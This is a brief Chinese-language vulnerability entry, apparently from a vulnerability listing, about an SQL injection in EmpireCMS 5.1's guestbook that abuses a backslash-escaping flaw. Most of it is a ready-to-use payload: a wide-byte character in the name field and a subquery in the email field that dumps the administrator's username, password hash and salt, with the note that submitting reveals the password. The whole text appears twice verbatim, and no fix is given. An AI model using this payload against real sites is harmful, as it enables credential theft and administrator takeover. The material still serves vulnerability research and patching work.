VULHUB ™

EmpireCMS 5.1 有个过滤函数没处理好\，可能导致产生多处垃圾类型的注射漏洞 比如留言处注射： e/tool/gbook/?bid=1 姓名： 縗\ 邮箱：,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/* 电话和留言内容随便写，提交完了就可以看到密码了 EmpireCMS 5.1 暂无， www.phome.net/

EmpireCMS 5.1 有个过滤函数没处理好\，可能导致产生多处垃圾类型的注射漏洞 比如留言处注射： e/tool/gbook/?bid=1 姓名： 縗\ 邮箱：,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/* 电话和留言内容随便写，提交完了就可以看到密码了 EmpireCMS 5.1 暂无， www.phome.net/